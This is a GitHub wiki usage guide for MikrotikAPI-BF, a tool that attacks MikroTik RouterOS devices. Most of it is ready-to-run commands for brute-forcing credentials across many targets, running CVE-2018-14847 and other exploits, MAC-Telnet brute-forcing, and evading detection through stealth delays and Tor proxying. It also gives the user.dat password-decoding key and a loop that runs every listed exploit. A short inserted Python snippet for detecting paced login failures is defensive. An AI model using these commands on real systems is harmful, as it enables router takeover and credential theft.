Complete Usage Guide - mrhenrike/MikrotikAPI-BF GitHub Wiki

Complete Usage Guide — MikrotikAPI-BF v3.10.0

For authorized security testing only. All examples require explicit written permission from the target system's owner.


Quick Start

git clone https://github.com/mrhenrike/MikrotikAPI-BF.git
cd MikrotikAPI-BF
pip install -r requirements.txt
python mikrotikapi-bf.py --help

1. Basic Brute-Force

Single target, single user, password list

python mikrotikapi-bf.py -t 192.168.1.1 -U admin -d wordlists/passwords.lst

Username list + password list

python mikrotikapi-bf.py -t 192.168.1.1 -u users.lst -p passwords.lst

Combo file (user:pass format)

python mikrotikapi-bf.py -t 192.168.1.1 -d combos.lst

Custom API port

python mikrotikapi-bf.py -t 192.168.1.1 --api-port 1337 -d passwords.lst

Test single credential

python mikrotikapi-bf.py -t 192.168.1.1 -U admin -P mypassword

2. Multi-Target Scanning (v3.5.0+)

From targets.txt (one IP per line, # for comments):

# targets.txt
192.168.1.1
192.168.1.254
10.0.0.1

python mikrotikapi-bf.py -T targets.txt -d passwords.lst -U admin
python mikrotikapi-bf.py --target-list targets.txt -d combos.lst --threads 5

3. Post-Login Service Validation

# Validate FTP, SSH, Telnet after successful login
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --validate ftp,ssh,telnet

# Custom ports
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --validate ftp=2121,ssh=2222

# All services with verbose output
python mikrotikapi-bf.py -t 192.168.1.1 -U admin -P pass \
  --validate ftp,ssh,telnet --verbose

4. CVE / Vulnerability Scanning

# Scan applicable CVEs for the detected RouterOS version
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve -U admin -P pass

# Scan ALL CVEs (regardless of version match)
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve --all-cves -U admin -P pass

# Export CVE results to JSON
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve --all-cves \
  -U admin -P pass --export json --export-dir ./results

5. MAC-Server / Layer-2 Discovery (v3.3.0+)

Requires being on the same Layer-2 segment (VLAN/switch).

# Discover all Mikrotik devices on the local L2 segment
python mikrotikapi-bf.py --mac-discover

# Discover + brute-force credentials via MAC-Telnet
python mikrotikapi-bf.py --mac-discover --mac-brute -d passwords.lst

# Run CVE-2018-14847 against all discovered devices
python mikrotikapi-bf.py --mac-scan-cve

# Specify local IP for MNDP broadcast
python mikrotikapi-bf.py --mac-discover --mac-iface-ip 192.168.1.50

6. Offline Credential Decoders (v3.5.0+)

Based on research by Kirils Solovjovs (0ki/mikrotik-tools).

Decode user.dat (obtained via CVE-2018-14847)

# Basic decode
python mikrotikapi-bf.py --decode-userdat user.dat

# With index file for better accuracy
python mikrotikapi-bf.py --decode-userdat user.dat --decode-useridx user.idx

# Password algorithm (for reference):
# key = MD5(username + "283i4jfkai3389")  # 16 bytes
# plaintext = XOR(encrypted_password, key * 16)

Decode .backup file

python mikrotikapi-bf.py --decode-backup router.backup
# Extracts all .dat/.idx files and auto-decodes user credentials

Analyze NPK package (CVE-2019-3977)

python mikrotikapi-bf.py --analyze-npk routeros-7.20.7-x86_64.npk
# Lists parts, checks digest, detects install scripts

List supout.rif sections

python mikrotikapi-bf.py --decode-supout supout.rif

7. Device Fingerprinting

python mikrotikapi-bf.py -t 192.168.1.1 -U admin -P pass --fingerprint

8. Stealth Mode

# Fibonacci delays, randomized User-Agents
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --stealth

# Custom delay between attempts
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst -s 10
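
For defenders, the pacing options above are the reason short-window rate rules miss this traffic. The following is an added example, not part of MikrotikAPI-BF: it counts failed logins per source over a long sliding window and compares that with a 30-second rule. The log line layout is an assumption modelled on RouterOS "login failure" messages, and the sample lines are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed layout, modelled on RouterOS "login failure" log messages; adapt to your syslog.
LINE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) .*login failure for user "
    r"(?P<user>\S+) from (?P<src>\S+) via (?P<svc>\S+)"
)

def detect(lines, window_s=3600, max_failures=5):
    """Return {source: peak failures in any window} for sources above max_failures."""
    window = timedelta(seconds=window_s)
    recent = defaultdict(deque)  # source -> failure timestamps still inside the window
    flagged = {}
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a failed-login record
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        q = recent[m["src"]]
        q.append(ts)
        while ts - q[0] > window:  # drop failures that aged out of the window
            q.popleft()
        if len(q) > max_failures:
            flagged[m["src"]] = max(flagged.get(m["src"], 0), len(q))
    return flagged

def sample_log():
    """Constructed data: 20 failures spaced 10 s apart, plus 2 typos from an admin host."""
    t0 = datetime(2024, 1, 1, 3, 0, 0)
    fmt = "{} system,error,critical login failure for user admin from {} via api"
    paced = [fmt.format(t0 + timedelta(seconds=10 * i), "192.168.1.50") for i in range(20)]
    typos = [fmt.format(t0 + timedelta(minutes=5, seconds=i), "192.168.1.10") for i in range(2)]
    return sorted(paced + typos)

if __name__ == "__main__":
    print("30 s window :", detect(sample_log(), window_s=30))
    print("1 h window  :", detect(sample_log()))
```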

9. Threading

# Default: 2 threads; max 15
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --threads 8

10. Session Resume

# Start with session
python mikrotikapi-bf.py -t 192.168.1.1 -d big_list.lst

# Resume if interrupted (uses saved checkpoint)
python mikrotikapi-bf.py -t 192.168.1.1 -d big_list.lst --resume

# List saved sessions
python mikrotikapi-bf.py --list-sessions

# Force new session (ignore existing)
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --force

11. Export Results

# Export to JSON
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --export json

# Export to all formats (JSON, CSV, XML, TXT)
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --export-all

# Custom export directory
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst \
  --export-all --export-dir ./pentest-report

12. Proxy / SOCKS5

# Route through Tor
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --proxy socks5://127.0.0.1:9050

13. SSL / API-SSL

# Use encrypted API-SSL (port 8729)
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --ssl --api-port 8729

14. Interactive REPL

python mikrotikapi-bf.py --interactive

# Inside REPL:
# mikrotik-bf> scan 192.168.1.0/24      # Discover Mikrotik devices
# mikrotik-bf> scan -r 10.0.0.1 10.0.0.254
# mikrotik-bf> fingerprint 192.168.1.1
# mikrotik-bf> attack 192.168.1.1
# mikrotik-bf> attack 192.168.1.1 -w wordlists/combos.lst
# mikrotik-bf> exploits 192.168.1.1     # Show applicable CVEs
# mikrotik-bf> results                   # Show found credentials
# mikrotik-bf> export json               # Export results
# mikrotik-bf> stealth on
# mikrotik-bf> exit

15. Full Pentest Workflow Example

# 1. Discover + fingerprint
python mikrotikapi-bf.py -t 192.168.1.1 --fingerprint

# 2. Run CVE scan (unauthenticated)
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve

# 3. Brute-force with stealth
python mikrotikapi-bf.py -t 192.168.1.1 \
  -u users.lst -d passwords.lst \
  --stealth --threads 3 --progress

# 4. Full authenticated scan after creds found
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve --all-cves \
  -U admin -P "C0C0D3GR120" \
  --validate ftp,ssh,telnet \
  --export-all --export-dir ./report/

# 5. MAC-Server attack (if on same L2)
python mikrotikapi-bf.py --mac-discover --mac-brute -d combos.lst

# 6. Decode extracted credentials
python mikrotikapi-bf.py --decode-userdat /tmp/user.dat --decode-useridx /tmp/user.idx

16. Programmatic API (Python)

from xpl.exploits import EXPLOIT_REGISTRY
from modules.decoder import UserDatDecoder

# Run a specific CVE check
e = EXPLOIT_REGISTRY["CVE-2018-14847"]("192.168.1.1", timeout=10)
result = e.check()
print(result)

# Decode user.dat
users = UserDatDecoder.from_files("user.dat", "user.idx")
UserDatDecoder.print_table(users)

# Run all EDB exploits
target = "192.168.1.1"
for eid in [k for k in EXPLOIT_REGISTRY if k.startswith("EDB-")]:
    r = EXPLOIT_REGISTRY[eid](target, timeout=5).check()
    print(f"[{eid}] {'VULN' if r['vulnerable'] else 'SAFE'}: {r.get('evidence','')[:80]}")

17. Environment Variables

export MIKROTIK_TARGET=192.168.1.1
export MIKROTIK_USER=admin
export MIKROTIK_PASS=password
export SHODAN_KEY=your_shodan_key
export NVD_KEY=your_nvd_key

All CLI Flags Reference

| Flag | Short | Description | Default | Since |
|------|-------|-------------|---------|-------|
| --target | -t | Target IP/hostname | | v1.0 |
| --target-list | -T | File with targets (one per line) | | v3.5.0 |
| --user | -U | Single username | admin | v1.0 |
| --passw | -P | Single password | | v1.0 |
| --userlist | -u | Username wordlist file | | v1.0 |
| --passlist | -p | Password wordlist file | | v1.0 |
| --dictionary | -d | Combo file (user:pass) | | v1.0 |
| --seconds | -s | Delay between attempts (s) | 5 | v1.0 |
| --threads | | Thread count (max 15, 300 w/ --high-threads) | 2 | v2.0 |
| --high-threads | | Allow up to 300 threads | false | v3.6.0 |
| --delay-mode | | Delay profile: high/balanced/stealth/custom | balanced | v3.6.0 |
| --api-port | | RouterOS API port | 8728 | v1.0 |
| --rest-port | | RouterOS REST port | 8729 | v3.5.0 |
| --http-port | | HTTP port | 80 | v3.5.0 |
| --ssl | | Use HTTPS for REST | false | v3.5.0 |
| --ssl-port | | HTTPS port | 443 | v3.5.0 |
| --validate | | Post-login validation services | | v2.1 |
| --verbose | -v | Show failed attempts | false | v1.0 |
| --verbose-all | -vv | Full debug | false | v2.0 |
| --progress | | Progress bar + ETA | false | v2.1 |
| --stealth | | Stealth delays + UA rotation | false | v2.1 |
| --fingerprint | | Advanced device fingerprinting | false | v2.1 |
| --exploit | | Run CVE scanner after BF | false | v3.5.0 |
| --scan-cve | | Standalone CVE scan | false | v3.5.0 |
| --all-cves | | Show all CVEs (ignore version) | false | v3.5.0 |
| --run-exploit | | Run specific exploit by CVE/EDB ID | | v3.10.0 |
| --audit | | 8-phase automated security audit | false | v3.10.0 |
| --proxy | | Proxy URL (socks5://...) | | v3.5.4 |
| --interactive | | Start interactive REPL | false | v3.5.0 |
| --max-retries | | Connection retry count | 1 | v3.5.0 |
| --export | | Export formats (json,csv,xml,txt,sarif) | | v2.1 |
| --export-all | | Export to all formats | false | v2.1 |
| --export-dir | | Output directory | results | v2.1 |
| --audit-report | | Generate PDF audit report | false | v2.1 |
| --resume | | Resume from previous session | false | v2.1 |
| --force | | Force new session | false | v2.1 |
| --list-sessions | | List saved sessions | | v2.1 |
| --mac-discover | | MNDP broadcast discovery | false | v3.3.0 |
| --mac-brute | | Brute via MAC-Telnet | false | v3.3.0 |
| --mac-scan-cve | | CVE-2018-14847-MAC scan | false | v3.3.0 |
| --mac-iface-ip | | Local IP for MNDP broadcast | 0.0.0.0 | v3.3.0 |
| --decode-userdat | | Decode user.dat offline | | v3.5.0 |
| --decode-useridx | | user.idx companion | | v3.5.0 |
| --decode-backup | | Decode .backup archive | | v3.5.0 |
| --analyze-npk | | Analyze NPK package | | v3.5.0 |
| --decode-supout | | List supout.rif sections | | v3.5.0 |
| --install-nse | | Install NSE scripts to Nmap | | v3.6.0 |

18. NSE Auto-Install

mikrotikapi-install-nse
mikrotikapi-bf --install-nse
NMAP_SCRIPTS_DIR=/custom/path mikrotikapi-install-nse

19. High-Thread Mode (up to 300)

python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --threads 100 --high-threads
python mikrotikapi-bf.py -T targets.lst -d combos.lst --threads 300 --high-threads

20. Delay Profiles (v3.6.0+)

python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --delay-mode high      # 0s
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --delay-mode balanced  # 0.25s
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --delay-mode stealth   # 1.0s
python mikrotikapi-bf.py -t 192.168.1.1 -d passwords.lst --delay-mode custom -s 0.5

21. Run Specific Exploit (v3.10.0+)

python mikrotikapi-bf.py -t 192.168.1.1 --run-exploit CVE-2018-14847
python mikrotikapi-bf.py -t 192.168.1.1 --run-exploit CVE-2023-30799 -U admin -P pass

22. 8-Phase Security Audit (v3.10.0+)

python mikrotikapi-bf.py -t 192.168.1.1 --audit -U admin -P pass --export sarif
python mikrotikapi-bf.py -t 192.168.1.1 --audit -U admin -P pass --export-all

Phases: system enumeration, service mapping, credential audit, injection testing, Winbox probing, SNMP analysis, debug endpoint discovery, firewall audit.


Interactive REPL Commands (v3.10.0+)

python mikrotikapi-bf.py --interactive

mikrotik-bf> run CVE-2018-14847 192.168.1.1   # Run exploit
mikrotik-bf> audit 192.168.1.1                # Run full audit
mikrotik-bf> scan 192.168.1.0/24              # Discover
mikrotik-bf> exploits 192.168.1.1             # List CVEs